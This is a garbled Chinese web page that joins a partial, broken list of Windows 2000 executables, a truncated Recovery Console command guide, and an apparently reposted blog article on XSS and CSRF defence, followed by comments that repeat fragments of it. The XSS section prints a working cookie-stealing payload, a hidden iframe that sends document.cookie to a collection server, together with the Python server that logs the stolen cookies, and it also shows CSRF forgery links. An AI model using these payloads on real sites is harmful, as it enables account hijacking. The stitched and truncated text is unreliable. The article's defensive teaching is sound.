netsh.exe - Creates a shell for network information 用于配置和监控 Windows 2

000 命令行脚本接口。

netstat.exe - Displays current connections. 显示协议统计和当前的 TCP/IP 网络

连接。

nlsfunc.exe - Loads country-specific information 加载特定国家(地区)的信息。

Windows 2000 和 MS-DOS 子系统不使用该命令。接受该命令只是为了与 MS-DOS 文件兼

容。

notepad.exe - Opens Windows 2000 Notepad 记事本

nslookup.exe - Displays information for DNS 该诊断工具显示来自域名系统 (DNS)

名称服务器的信息。

ntbackup.exe - Opens the NT Backup Utility 备份和故障修复工具

ntbooks.exe - Starts Windows Help Utility 帮助

ntdsutil.exe - Performs DB maintenance of the ADSI 完成ADSI的DB的维护

ntfrs.exe - NT File Replication Service NT文件复制服务

ntfrsupg.exe -

ntkrnlpa.exe - Kernel patch 核心补丁

ntoskrnl.exe - Core NT Kernel KT的核心

ntsd.exe -

ntvdm.exe - Simulates a 16-bit Windows environment 模拟16位Windows环境

nw16.exe - Netware Redirector NetWare转向器

nwscript.exe - runs netware scripts 运行Netware脚本

odbcad32.exe - ODBC 32-bit Administrator 32位ODBC管理

odbcconf.exe - Configure ODBC drivers and data sources from command line 命

令行配置ODBC驱动和数据源

taskman.exe - Task Manager 任务管理器

taskmgr.exe - Starts the Windows 2000 Task Manager 任务管理器

tcmsetup.exe - telephony client wizard 电话服务客户安装

tcpsvcs.exe - TCP Services TCP服务

.exe - Telnet Utility used to connect to Telnet Server

termsrv.exe - Terminal Server 终端服务

t - Trivial FTP 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行

TFTP 服务的远程计算机传输文件

tftpd.exe - Trivial FTP Daemon

themes.exe - Change Windows Themes 桌面主题

tlntadmn.exe - Telnet Server Administrator Telnet服务管理

tlntsess.exe - Display the current Telnet Sessions 显示目前的Telnet会话

tlntsvr.exe - Start the Telnet Server 开始Telnet服务

tracert.exe - Trace a route to display paths 该诊断实用程序将包含不同生存时间

(TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标

采用的路由

tsadmin.exe - Terminal Server Administrator 终端服务管理器

tscon.exe - Attaches a user session to a terminal session. 粘贴用户会话到终端

对话

tsdiscon.exe - Disconnect a user from a terminal session 断开终端服务的用户

tskill.exe - Kill a Terminal server process 杀掉终端服务

tsprof.exe - Used with Terminal Server to query results. 用终端服务得出查询结

tsshutdn.exe - Shutdown the system 关闭系统

unlodctr.exe - Part of performance monitoring 性能监视器的一部分

upg351db.exe - Upgrade a jet database 升级Jet数据库

ups.exe - UPS service UPS服务

user.exe - Core Windows Service Windows核心服务

userinit.exe - Part of the winlogon process Winlogon进程的一部分

usrmgr.exe - Start the windows user manager for domains 域用户管理器

utilman.exe - This tool enables an administrator to designate which computers automatically open accessibility tools when Windows 2000 starts. 指定2000启动时自动打开那台机器

verifier.exe - Driver Verifier Manager Driver Verifier Manager

vwipxspx.exe - Loads IPX/SPX VDM 调用IPX/SPX VDM

w32tm.exe - Windows Time Server 时间服务器

wextract.exe - Used to extract windows files 解压缩Windows文件

winchat.exe - Opens Windows Chat 打开Windows聊天

winhlp32.exe - Starts the Windows Help System 运行帮助系统

winlogon.exe - Used as part of the logon process. Logon进程的一部分

winmine.exe - windows Game 挖地雷

winmsd.exe - Windows Diagnostic utility 系统信息

wins.exe - Wins Service Wins服务

winspool.exe - Print Routing 打印路由

winver.exe - Displays the current version of Windows 显示Windows版本

wizmgr.exe - Starts Windows Administration Wizards Windows管理向导

wjview.exe - Command line loader for Java 命令行调用Java

wowdeb.exe - . For starters, the 32-bit APIs require that the WOWDEB.EXE tas

k runs in the target debugees VM 启动时,32位API需要

wowexec.exe - For running Windows over Windows Applications 在Windows应用程序

上运行Windows

wpnpinst.exe - ?

write.exe - Starts MS Write Program 写字板

wscript.exe - Windows Scripting Utility 脚本工具

wupdmgr.exe - Starts the Windows update Wizard (Internet) 运行Windows升级向导

xcopy.exe - 复制文件和目录,包括子目录

Win XP控制台命令详解

Win XP(包括2000)的控制台命令是在系统出现一些意外情况下的一种非常有效的

诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结,这

次辛苦老范给我们整理了这份实用的秘笈。

第一部分:文件和目录操作命令

Attrib Batch Chdir (Cd) Copy Delete (Del) Expand Mkdir (md) Rmdir (Rd) Type

More

第二部分:系统和磁盘操作命令

Bootcfg hkdsk Diskpart Fixboot Fixmbr format Map

第三部分:辅助操作和特殊功能命令

Cls Disable Enable Exit Help commandname Listsvc Logon Net use

Set Systemroot

Attrib

更改单个文件或目录的属性。该命令设置或删除指派给文件或目录的只读、系统、

存档、隐藏以及压缩属性。

含有下列参数的 attrib 命令仅当使用故障恢复控制台时才可用。含有不同参数的

attrib

命令可在命令提示符中使用。

attrib [ +r|-r] [ +s|-s] [ +h|-h] [ +c|-c] [ [ drive:] [ path] filename]

参数

+r 设置只读属性。

-r 清除只读属性。

+s 设置系统属性。

-s 清除系统属性。

+h 设置隐藏属性。

-h 清除隐藏属性。

+c 设置压缩属性。

-c 清除压缩属性。

[ [ drive:] [ path] filename]

指定要处理的目录或文件的位置和名称。可以一次只更改一个文件,也可以更改整

个目录。

注意:可以用一个命令更改一个文件或目录的多个属性。

Batch

执行在文本文件中指定的命令。batch 命令仅在使用故障恢复控制台时才可用。故

障恢复控制台可以从安装 CD 中启动。

batch input_fil

前端安全方面有没有了解?xss和csrf如何攻防

在那个年代,大家一般用拼接字符串的方式来构造动态 SQL 语句创建应用,于是 SQL 注入成了很流行的攻击方式。在这个年代, 参数化查询 已经成了普遍用法,我们已经离 SQL 注入很远了。但是,历史同样悠久的 XSS 和 CSRF 却没有远离我们。由于之前已经对 XSS 很熟悉了,所以我对用户输入的数据一直非常小心。如果输入的时候没有经过 Tidy 之类的过滤,我一定会在模板输出时候全部转义。所以个人感觉,要避免 XSS 也是很容易的,重点是要“小心”。但最近又听说了另一种跨站攻击 CSRF ,于是找了些资料了解了一下,并与 XSS 放在一起做个比较。

XSS:脚本中的不速之客

XSS 全称“跨站脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是通过一些正常的站内交互途径,例如发布评论,提交含有 JavaScript 的内容文本。这时服务器端如果没有过滤或转义掉这些脚本,作为内容发布到了页面上,其他用户访问这个页面的时候就会运行这些脚本。

运行预期之外的脚本带来的后果有很多中,可能只是简单的恶作剧——一个关不掉的窗口:

1

2

3

while (true) {

alert("你关不掉我~");

}

也可以是盗号或者其他未授权的操作——我们来模拟一下这个过程,先建立一个用来收集信息的服务器:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

#!/usr/bin/env python

#-*- coding:utf-8 -*-

"""

跨站脚本注入的信息收集服务器

"""

import bottle

app = bottle.Bottle()

plugin = bottle.ext.sqlite.Plugin(dbfile='/var/db/myxss.sqlite')

app.install(plugin)

@app.route('/myxss/')

def show(cookies, db):

SQL = 'INSERT INTO "myxss" ("cookies") VALUES (?)'

try:

db.execute(SQL, cookies)

except:

pass

return ""

if __name__ == "__main__":

app.run()

然后在某一个页面的评论中注入这段代码:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

// 用 script type="text/javascript"/script 包起来放在评论中

(function(window, document) {

// 构造泄露信息用的 URL

var cookies = document.cookie;

var xssURIBase = "";

var xssURI = xssURIBase + window.encodeURI(cookies);

// 建立隐藏 iframe 用于通讯

var hideFrame = document.createElement("iframe");

hideFrame.height = 0;

hideFrame.width = 0;

hideFrame.style.display = "none";

hideFrame.src = xssURI;

// 开工

document.body.appendChild(hideFrame);

})(window, document);

于是每个访问到含有该评论的页面的用户都会遇到麻烦——他们不知道背后正悄悄的发起了一个请求,是他们所看不到的。而这个请求,会把包含了他们的帐号和其他隐私的信息发送到收集服务器上。

我们知道 AJAX 技术所使用的 XMLHttpRequest 对象都被浏览器做了限制,只能访问当前域名下的 URL,所谓不能“跨域”问题。这种做法的初衷也是防范 XSS,多多少少都起了一些作用,但不是总是有用,正如上面的注入代码,用 iframe 也一样可以达到相同的目的。甚至在愿意的情况下,我还能用 iframe 发起 POST 请求。当然,现在一些浏览器能够很智能地分析出部分 XSS 并予以拦截,例如新版的 Firefox、Chrome 都能这么做。但拦截不总是能成功,何况这个世界上还有大量根本不知道什么是浏览器的用户在用着可怕的 IE6。从原则上将,我们也不应该把事关安全性的责任推脱给浏览器,所以防止 XSS 的根本之道还是过滤用户输入。用户输入总是不可信任的,这点对于 Web 开发者应该是常识。

正如上文所说,如果我们不需要用户输入 HTML 而只想让他们输入纯文本,那么把所有用户输入进行 HTML 转义输出是个不错的做法。似乎很多 Web 开发框架、模版引擎的开发者也发现了这一点,Django 内置模版和 Jinja2 模版总是默认转义输出变量的。如果没有使用它们,我们自己也可以这么做。PHP 可以用 htmlspecialchars 函数,Python 可以导入 cgi 模块用其中的 cgi.escape 函数。如果使用了某款模版引擎,那么其必自带了方便快捷的转义方式。

真正麻烦的是,在一些场合我们要允许用户输入 HTML,又要过滤其中的脚本。Tidy 等 HTML 清理库可以帮忙,但前提是我们小心地使用。仅仅粗暴地去掉 script 标签是没有用的,任何一个合法 HTML 标签都可以添加 onclick 一类的事件属性来执行 JavaScript。对于复杂的情况,我个人更倾向于使用简单的方法处理,简单的方法就是白名单重新整理。用户输入的 HTML 可能拥有很复杂的结构,但我们并不将这些数据直接存入数据库,而是使用 HTML 解析库遍历节点,获取其中数据(之所以不使用 XML 解析库是因为 HTML 要求有较强的容错性)。然后根据用户原有的标签属性,重新构建 HTML 元素树。构建的过程中,所有的标签、属性都只从白名单中拿取。这样可以确保万无一失——如果用户的某种复杂输入不能为解析器所识别(前面说了 HTML 不同于 XML,要求有很强的容错性),那么它不会成为漏网之鱼,因为白名单重新整理的策略会直接丢弃掉这些未能识别的部分。最后获得的新 HTML 元素树,我们可以拍胸脯保证——所有的标签、属性都来自白名单,一定不会遗漏。

现在看来,大多数 Web 开发者都了解 XSS 并知道如何防范,往往大型的 XSS 攻击(包括前段时间新浪微博的 XSS 注入)都是由于疏漏。我个人建议在使用模版引擎的 Web 项目中,开启(或不要关闭)类似 Django Template、Jinja2 中“默认转义”(Auto Escape)的功能。在不需要转义的场合,我们可以用类似 的方式取消转义。这种白名单式的做法,有助于降低我们由于疏漏留下 XSS 漏洞的风险。

另外一个风险集中区域,是富 AJAX 类应用(例如豆瓣网的阿尔法城)。这类应用的风险并不集中在 HTTP 的静态响应内容,所以不是开启模版自动转义能就能一劳永逸的。再加上这类应用往往需要跨域,开发者不得不自己打开危险的大门。这种情况下,站点的安全非常 依赖开发者的细心和应用上线前有效的测试。现在亦有不少开源的 XSS 漏洞测试软件包(似乎有篇文章提到豆瓣网的开发也使用自动化 XSS 测试),但我都没试用过,故不予评价。不管怎么说,我认为从用户输入的地方把好关总是成本最低而又最有效的做法。

CSRF:冒充用户之手

起初我一直弄不清楚 CSRF 究竟和 XSS 有什么区别,后来才明白 CSRF 和 XSS 根本是两个不同维度上的分类。XSS 是实现 CSRF 的诸多途径中的一条,但绝对不是唯一的一条。一般习惯上把通过 XSS 来实现的 CSRF 称为 XSRF。

CSRF 的全称是“跨站请求伪造”,而 XSS 的全称是“跨站脚本”。看起来有点相似,它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户,但前面说了,它们的攻击类型是不同维度上的分 类。CSRF 顾名思义,是伪造请求,冒充用户在站内的正常操作。我们知道,绝大多数网站是通过 cookie 等方式辨识用户身份(包括使用服务器端 Session 的网站,因为 Session ID 也是大多保存在 cookie 里面的),再予以授权的。所以要伪造用户的正常操作,最好的方法是通过 XSS 或链接欺骗等途径,让用户在本机(即拥有身份 cookie 的浏览器端)发起用户所不知道的请求。

严格意义上来说,CSRF 不能分类为注入攻击,因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌,但对于设计不佳的网站,一条正常的链接都能造成 CSRF。

例如,一论坛网站的发贴是通过 GET 请求访问,点击发贴之后 JS 把发贴内容拼接成目标 URL 并访问:

标题content=内容

那么,我只需要在论坛中发一帖,包含一链接:

我是脑残content=哈哈

只要有用户点击了这个链接,那么他们的帐户就会在不知情的情况下发布了这一帖子。可能这只是个恶作剧,但是既然发贴的请求可以伪造,那么删帖、转帐、改密码、发邮件全都可以伪造。

如何解决这个问题,我们是否可以效仿上文应对 XSS 的做法呢?过滤用户输入, 不允许发布这种含有站内操作 URL 的链接。这么做可能会有点用,但阻挡不了 CSRF,因为攻击者可以通过 QQ 或其他网站把这个链接发布上去,为了伪装可能还使用 bit.ly 压缩一下网址,这样点击到这个链接的用户还是一样会中招。所以对待 CSRF ,我们的视角需要和对待 XSS 有所区别。CSRF 并不一定要有站内的输入,因为它并不属于注入攻击,而是请求伪造。被伪造的请求可以是任何来源,而非一定是站内。所以我们唯有一条路可行,就是过滤请求的 处理者。

比较头痛的是,因为请求可以从任何一方发起,而发起请求的方式多种多样,可以通过 iframe、ajax(这个不能跨域,得先 XSS)、Flash 内部发起请求(总是个大隐患)。由于几乎没有彻底杜绝 CSRF 的方式,我们一般的做法,是以各种方式提高攻击的门槛。

首先可以提高的一个门槛,就是改良站内 API 的设计。对于发布帖子这一类创建资源的操作,应该只接受 POST 请求,而 GET 请求应该只浏览而不改变服务器端资源。当然,最理想的做法是使用 REST 风格 的 API 设计,GET、POST、PUT、DELETE 四种请求方法对应资源的读取、创建、修改、删除。现在的浏览器基本不支持在表单中使用 PUT 和 DELETE 请求方法,我们可以使用 ajax 提交请求(例如通过 jquery-form 插件,我最喜欢的做法),也可以使用隐藏域指定请求方法,然后用 POST 模拟 PUT 和 DELETE (Ruby on Rails 的做法)。这么一来,不同的资源操作区分的非常清楚,我们把问题域缩小到了非 GET 类型的请求上——攻击者已经不可能通过发布链接来伪造请求了,但他们仍可以发布表单,或者在其他站点上使用我们肉眼不可见的表单,在后台用 js 操作,伪造请求。

接下来我们就可以用比较简单也比较有效的方法来防御 CSRF,这个方法就是“请求令牌”。读过《J2EE 核心模式》的同学应该对“同步令牌”应该不会陌生,“请求令牌”和“同步令牌”原理是一样的,只不过目的不同,后者是为了解决 POST 请求重复提交问题,前者是为了保证收到的请求一定来自预期的页面。实现方法非常简单,首先服务器端要以某种策略生成随机字符串,作为令牌(token), 保存在 Session 里。然后在发出请求的页面,把该令牌以隐藏域一类的形式,与其他信息一并发出。在接收请求的页面,把接收到的信息中的令牌与 Session 中的令牌比较,只有一致的时候才处理请求,否则返回 HTTP 403 拒绝请求或者要求用户重新登陆验证身份。

请求令牌虽然使用起来简单,但并非不可破解,使用不当会增加安全隐患。使用请求令牌来防止 CSRF 有以下几点要注意:

虽然请求令牌原理和验证码有相似之处,但不应该像验证码一样,全局使用一个 Session Key。因为请求令牌的方法在理论上是可破解的,破解方式是解析来源页面的文本,获取令牌内容。如果全局使用一个 Session Key,那么危险系数会上升。原则上来说,每个页面的请求令牌都应该放在独立的 Session Key 中。我们在设计服务器端的时候,可以稍加封装,编写一个令牌工具包,将页面的标识作为 Session 中保存令牌的键。

在 ajax 技术应用较多的场合,因为很有请求是 JavaScript 发起的,使用静态的模版输出令牌值或多或少有些不方便。但无论如何,请不要提供直接获取令牌值的 API。这么做无疑是锁上了大门,却又把钥匙放在门口,让我们的请求令牌退化为同步令牌。

第一点说了请求令牌理论上是可破解的,所以非常重要的场合,应该考虑使用验证码(令牌的一种升级,目前来看破解难度极大),或者要求用户再次输入密码(亚马逊、淘宝的做法)。但这两种方式用户体验都不好,所以需要产品开发者权衡。

无论是普通的请求令牌还是验证码,服务器端验证过一定记得销毁。忘记销毁用过的令牌是个很低级但是杀伤力很大的错误。我们学校的选课系统就有这个 问题,验证码用完并未销毁,故只要获取一次验证码图片,其中的验证码可以在多次请求中使用(只要不再次刷新验证码图片),一直用到 Session 超时。这也是为何选课系统加了验证码,外挂软件升级一次之后仍然畅通无阻。

如下也列出一些据说能有效防范 CSRF,其实效果甚微的方式甚至无效的做法。

通过 referer 判定来源页面:referer 是在 HTTP Request Head 里面的,也就是由请求的发送者决定的。如果我喜欢,可以给 referer 任何值。当然这个做法并不是毫无作用,起码可以防小白。但我觉得性价比不如令牌。

过滤所有用户发布的链接:这个是最无效的做法,因为首先攻击者不一定要从站内发起请求(上面提到过了),而且就算从站内发起请求,途径也远远不知链接一条。比如 img src="./create_post.php" / 就是个不错的选择,还不需要用户去点击,只要用户的浏览器会自动加载图片,就会自动发起请求。 *在请求发起页面用 alert 弹窗提醒用户:这个方法看上去能干扰站外通过 iframe 发起的 CSRF,但攻击者也可以考虑用 window.alert = function(){}; 把 alert 弄哑,或者干脆脱离 iframe,使用 Flash 来达到目的。

总体来说,目前防御 CSRF 的诸多方法还没几个能彻底无解的。所以 CSDN 上看到讨论 CSRF 的文章,一般都会含有“无耻”二字来形容(另一位有该名号的貌似是 DDOS 攻击)。作为开发者,我们能做的就是尽量提高破解难度。当破解难度达到一定程度,网站就逼近于绝对安全的位置了(虽然不能到达)。上述请求令牌方法,就我 认为是最有可扩展性的,因为其原理和 CSRF 原理是相克的。CSRF 难以防御之处就在于对服务器端来说,伪造的请求和正常的请求本质上是一致的。而请求令牌的方法,则是揪出这种请求上的唯一区别——来源页面不同。我们还可 以做进一步的工作,例如让页面中 token 的 key 动态化,进一步提高攻击者的门槛。本文只是我个人认识的一个总结,便不讨论过深了。

为什么rest还会有csrf攻击

在那个年代,大家一般用拼接字符串的方式来构造动态 SQL 语句创建应用,于是 SQL 注入成了很流行的攻击方式。

在这个年代, 参数化查询 已经成了普遍用法,我们已经离 SQL 注入很远了。但是,历史同样悠久的 XSS 和 CSRF 却没有远离我们。

2条大神的评论

  • avatar
    访客 2022-07-16 上午 09:19:05

    一种。其特点是不对服务器端造成任何伤害,而是通过一些正常的站内交互途径,例如发布评论,提交含有 JavaScript 的内容文本。这时服务器端如果没有过滤或转义掉这些脚本,作为内容发布到

  • avatar
    访客 2022-07-16 上午 09:35:22

    - display connection status lights 显示连接状况llsmgr.exe - windows 2000 license manager 2000许可协议管理llssrv.exe - start the lic

发表评论